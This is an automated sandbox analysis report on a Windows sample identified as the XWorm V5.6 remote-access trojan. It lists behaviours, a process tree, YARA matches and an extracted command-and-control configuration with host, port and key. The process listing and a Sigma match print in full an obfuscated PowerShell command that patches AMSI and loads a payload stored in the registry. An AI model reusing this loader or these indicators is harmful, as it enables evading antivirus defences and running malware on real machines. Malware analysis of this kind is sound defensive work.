Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
x433.exe

Overview

General Information

Sample name:x433.exe
Analysis ID:1465714
MD5:148ec472df90b0fb274c3ce2ad2e811f
SHA1:378ba02b08494b36ff5a2674cf99eba6c7025d6a
SHA256:a08b846be9052a2614ef6a6920260d465774f5da9926f6d08449a2e4eb27b787
Tags:exe
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains process injector
.NET source code references suspicious native API functions
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Connects to many ports of the same IP (likely port scanning)
Contains functionality to capture screen (.Net source)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Found suspicious powershell code related to unpacking or dynamic code loading
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential WinAPI Calls Via CommandLine
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Very long command line found
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Uncommon Svchost Parent Process
Stores files to the Windows start menu directory
Stores large binary data to the registry
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • x433.exe (PID: 6576 cmdline: "C:\Users\user\Desktop\x433.exe" MD5: 148EC472DF90B0FB274C3CE2AD2E811F)
    • x4Shellcode.exe (PID: 6808 cmdline: "C:\Users\user\AppData\Local\Temp\x4Shellcode.exe" MD5: 851BE4E85B0F111883680E87099483A3)
    • x4host.exe (PID: 6860 cmdline: "C:\Users\user\AppData\Local\Temp\x4host.exe" MD5: FD744070409A72B86CC2B344D1719B33)
  • powershell.exe (PID: 6976 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:rLleiAFHAZAE{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$OsygfxRUYuIQnc,[Parameter(Position=1)][Type]$MbVaDjEwaI)$reLCkliZwnS=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+''+[Char](100)+''+'D'+'e'+[Char](108)+''+'e'+''+[Char](103)+'a'+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+'e'+[Char](109)+''+[Char](111)+''+[Char](114)+'y'+'M'+'o'+[Char](100)+''+[Char](117)+'l'+'e'+'',$False).DefineType('My'+'D'+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+'ate'+[Char](84)+''+'y'+'p'+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+','+''+[Char](80)+''+'u'+'bl'+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+''+[Char](101)+''+'d'+','+'A'+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+'la'+[Char](115)+''+'s'+','+[Char](65)+''+'u'+''+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+'s',[MulticastDelegate]);$reLCkliZwnS.DefineConstructor(''+[Char](82)+''+'T'+'S'+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+'l'+[Char](78)+''+'a'+''+[Char](109)+'e'+[Char](44)+''+[Char](72)+''+'i'+'deByS'+'i'+''+'g'+''+[Char](44)+''+'P'+''+'u'+''+'b'+''+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$OsygfxRUYuIQnc).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+',M'+[Char](97)+''+'n'+''+[Char](97)+''+'g'+''+'e'+''+'d'+'');$reLCkliZwnS.DefineMethod(''+[Char](73)+''+[Char](110)+'v'+'o'+''+'k'+''+[Char](101)+'',''+[Char](80)+''+'u'+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+'deB'+'y'+''+'S'+'i'+[Char](103)+','+'N'+'ew'+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+','+'Vi'+[Char](114)+'t'+[Char](117)+''+[Char](97)+''+'l'+'',$MbVaDjEwaI,$OsygfxRUYuIQnc).SetImplementationFlags(''+'R'+''+'u'+''+'n'+''+'t'+''+'i'+'me'+[Char](44)+''+'M'+''+[Char](97)+''+'n'+''+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $reLCkliZwnS.CreateType();}$GGVrSjgYYZyVF=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+[Char](115)+''+[Char](116)+''+'e'+'m.'+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+'t.Wi'+[Char](110)+'32.'+'U'+''+[Char](110)+''+'s'+'a'+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'v'+''+[Char](101)+''+'M'+'eth'+'o'+''+[Char](100)+''+'s'+'');$VrBFKSFCQkTmpL=$GGVrSjgYYZyVF.GetMethod(''+'G'+''+[Char](101)+'tPr'+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+'d'+[Char](114)+''+[Char](101)+'s'+'s'+'',[Reflection.BindingFlags](''+[Char](80)+'u'+'b'+'l'+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+'t'+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$tYvGzbpkOpfGRXdvJJH=rLleiAFHAZAE @([String])([IntPtr]);$HEnSxsRJwrbfoKRDZnGDoe=rLleiAFHAZAE @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$BvRkuAkFmTg=$GGVrSjgYYZyVF.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+'ul'+[Char](101)+'H'+[Char](97)+'n'+'d'+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+'r'+''+[Char](110)+'e'+'l'+'32.'+[Char](100)+''+[Char](108)+''+'l'+'')));$JhuBDoUfjiRKob=$VrBFKSFCQkTmpL.Invoke($Null,@([Object]$BvRkuAkFmTg,[Object]('L'+[Char](111)+''+[Char](97)+''+'d'+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+'r'+''+'a'+'r'+[Char](121)+''+[Char](65)+'')));$XcIvzGHQpacLzdWNl=$VrBFKSFCQkTmpL.Invoke($Null,@([Object]$BvRkuAkFmTg,[Object](''+'V'+''+[Char](105)+'r'+[Char](116)+''+'u'+''+'a'+''+[Char](108)+'P'+[Char](114)+''+[Char](111)+''+[Char](116)+''+'e'+''+[Char](99)+''+[Char](116)+'')));$LyzHycQ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JhuBDoUfjiRKob,$tYvGzbpkOpfGRXdvJJH).Invoke(''+[Char](97)+'m'+[Char](115)+''+[Char](105)+''+[Char](46)+''+'d'+'l'+[Char](108)+'');$nrzKdroJBYOrdatEY=$VrBFKSFCQkTmpL.Invoke($Null,@([Object]$LyzHycQ,[Object](''+'A'+'msi'+[Char](83)+'ca'+[Char](110)+''+[Char](66)+'u'+[Char](102)+''+[Char](102)+'e'+'r'+'')));$GeTemELLqv=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XcIvzGHQpacLzdWNl,$HEnSxsRJwrbfoKRDZnGDoe).Invoke($nrzKdroJBYOrdatEY,[uint32]8,4,[ref]$GeTemELLqv);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$nrzKdroJBYOrdatEY,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XcIvzGHQpacLzdWNl,$HEnSxsRJwrbfoKRDZnGDoe).Invoke($nrzKdroJBYOrdatEY,[uint32]8,0x20,[ref]$GeTemELLqv);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+[Char](84)+''+'W'+''+[Char](65)+''+'R'+''+'E'+'').GetValue(''+[Char](120)+''+'4'+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+'er')).EntryPoint.Invoke($Null,$Null)" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dllhost.exe (PID: 2852 cmdline: C:\Windows\System32\dllhost.exe /Processid:{ae1c0bda-3b65-4ccd-a1ee-0c799d56cbd6} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
      • winlogon.exe (PID: 552 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
      • lsass.exe (PID: 628 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
      • svchost.exe (PID: 920 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • dwm.exe (PID: 988 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
      • svchost.exe (PID: 364 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 356 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 696 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 592 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1044 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1084 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1200 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1252 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1296 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1316 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1408 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1488 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1496 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1552 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1572 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1652 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1724 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1824 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1840 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1940 cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1948 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1956 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 2036 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • spoolsv.exe (PID: 1932 cmdline: C:\Windows\System32\spoolsv.exe MD5: 0D4B1E3E4488E9BDC035F23E1F4FE22F)
      • svchost.exe (PID: 2064 cmdline: C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 2152 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 2268 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 2388 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 2396 cmdline: C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • x4usb.exe (PID: 7064 cmdline: "C:\Users\user\AppData\Local\x4usb.exe" MD5: FD744070409A72B86CC2B344D1719B33)
  • cleanup
{"C2 url": ["session-chief.gl.at.ply.gg"], "Port": "36125", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\x4usb.exeJoeSecurity_XWormYara detected XWormJoe Security
    C:\Users\user\AppData\Local\x4usb.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      C:\Users\user\AppData\Local\x4usb.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0xc628:$s6: VirtualBox
      • 0xc586:$s8: Win32_ComputerSystem
      • 0xeb9c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0xec39:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0xed4e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0xe321:$cnc4: POST / HTTP/1.1
      C:\Users\user\AppData\Local\Temp\x4host.exeJoeSecurity_XWormYara detected XWormJoe Security
        C:\Users\user\AppData\Local\Temp\x4host.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          Click to see the 1 entries
          SourceRuleDescriptionAuthorStrings
          00000000.00000002.1709422465.0000000002991000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
            00000000.00000002.1709422465.0000000002991000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x20b80:$s6: VirtualBox
            • 0x32e00:$s6: VirtualBox
            • 0x20ade:$s8: Win32_ComputerSystem
            • 0x32d5e:$s8: Win32_ComputerSystem
            • 0x230f4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x35374:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x23191:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x35411:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x232a6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x35526:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x22879:$cnc4: POST / HTTP/1.1
            • 0x34af9:$cnc4: POST / HTTP/1.1
            00000002.00000000.1707631721.0000000000FB2000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_XWormYara detected XWormJoe Security
              00000002.00000000.1707631721.0000000000FB2000.00000002.00000001.01000000.00000007.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
              • 0xc428:$s6: VirtualBox
              • 0xc386:$s8: Win32_ComputerSystem
              • 0xe99c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
              • 0xea39:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
              • 0xeb4e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
              • 0xe121:$cnc4: POST / HTTP/1.1
              00000002.00000002.2967434276.0000000003181000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                Click to see the 2 entries
                SourceRuleDescriptionAuthorStrings
                0.2.x433.exe.29b77d8.1.unpackJoeSecurity_XWormYara detected XWormJoe Security
                  0.2.x433.exe.29b77d8.1.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                  • 0xa828:$s6: VirtualBox
                  • 0xa786:$s8: Win32_ComputerSystem
                  • 0xcd9c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                  • 0xce39:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                  • 0xcf4e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                  • 0xc521:$cnc4: POST / HTTP/1.1
                  2.0.x4host.exe.fb0000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                    2.0.x4host.exe.fb0000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                      2.0.x4host.exe.fb0000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                      • 0xc628:$s6: VirtualBox
                      • 0xc586:$s8: Win32_ComputerSystem
                      • 0xeb9c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                      • 0xec39:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                      • 0xed4e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                      • 0xe321:$cnc4: POST / HTTP/1.1
                      Click to see the 3 entries

                      System Summary

                      barindex
                      Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:rLleiAFHAZAE{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$OsygfxRUYuIQnc,[Parameter(Position=1)][Type]$MbVaDjEwaI)$reLCkliZwnS=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+''+[Char](100)+''+'D'+'e'+[Char](108)+''+'e'+''+[Char](103)+'a'+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+'e'+[Char](109)+''+[Char](111)+''+[Char](114)+'y'+'M'+'o'+[Char](100)+''+[Char](117)+'l'+'e'+'',$False).DefineType('My'+'D'+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+'ate'+[Char](84)+''+'y'+'p'+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+','+''+[Char](80)+''+'u'+'bl'+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+''+[Char](101)+''+'d'+','+'A'+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+'la'+[Char](115)+''+'s'+','+[Char](65)+''+'u'+''+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+'s',[MulticastDelegate]);$reLCkliZwnS.DefineConstructor(''+[Char](82)+''+'T'+'S'+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+'l'+[Char](78)+''+'a'+''+[Char](109)+'e'+[Char](44)+''+[Char](72)+''+'i'+'deByS'+'i'+''+'g'+''+[Char](44)+''+'P'+''+'u'+''+'b'+''+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$OsygfxRUYuIQnc).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+',M'+[Char](97)+''+'n'+''+[Char](97)+''+'g'+''+'e'+''+'d'+'');$reLCkliZwnS.DefineMethod(''+[Char](73)+''+[Char](110)+'v'+'o'+''+'k'+''+[Char](101)+'',''+[Char](80)+''+'u'+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+'deB'+'y'+''+'S'+'i'+[Char](103)+','+'N'+'ew'+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+','+'Vi'+[Char](114)+'t'+[Char](117)+''+[Char](97)+''+'l'+'',$MbVaDjEwaI,$OsygfxRUYuIQnc).SetImplementationFlags(''+'R'+''+'u'+''+'n'+''+'t'+''+'i'+'me'+[Char](44)+''+'M'+''+[Char](97)+''+'n'+''+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $reLCkliZwnS.CreateType();}$GGVrSjgYYZyVF=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+[Char](115)+''+[Char](116)+''+'e'+'m.'+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+'t.Wi'+[Char](110)+'32.'+'U'+''+[Char](110)+''+'s'+'a'+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'v'+''+[Char](101)+''+'M'+'eth'+'o'+''+[Char](100)+''+'s'+'');$VrBFKSFCQkTmpL=$GGVrSjgYYZyVF.GetMethod(''+'G'+''+[Char](101)+'tPr'+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+'d'+[Char](114)+''+[Char](101)+'s'+'s'+'',[Reflection.BindingFlags](''+[Char](80)+'u
                      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:rLleiAFHAZAE{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$OsygfxRUYuIQnc,[Parameter(Position=1)][Type]$MbVaDjEwaI)$reLCkliZwnS=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+''+[Char](100)+''+'D'+'e'+[Char](108)+''+'e'+''+[Char](103)+'a'+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+'e'+[Char](109)+''+[Char](111)+''+[Char](114)+'y'+'M'+'o'+[Char](100)+''+[Char](117)+'l'+'e'+'',$False).DefineType('My'+'D'+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+'ate'+[Char](84)+''+'y'+'p'+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+','+''+[Char](80)+''+'u'+'bl'+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+''+[Char](101)+''+'d'+','+'A'+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+'la'+[Char](115)+''+'s'+','+[Char](65)+''+'u'+''+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+'s',[MulticastDelegate]);$reLCkliZwnS.DefineConstructor(''+[Char](82)+''+'T'+'S'+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+'l'+[Char](78)+''+'a'+''+[Char](109)+'e'+[Char](44)+''+[Char](72)+''+'i'+'deByS'+'i'+''+'g'+''+[Char](44)+''+'P'+''+'u'+''+'b'+''+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$OsygfxRUYuIQnc).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+',M'+[Char](97)+''+'n'+''+[Char](97)+''+'g'+''+'e'+''+'d'+'');$reLCkliZwnS.DefineMethod(''+[Char](73)+''+[Char](110)+'v'+'o'+''+'k'+''+[Char](101)+'',''+[Char](80)+''+'u'+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+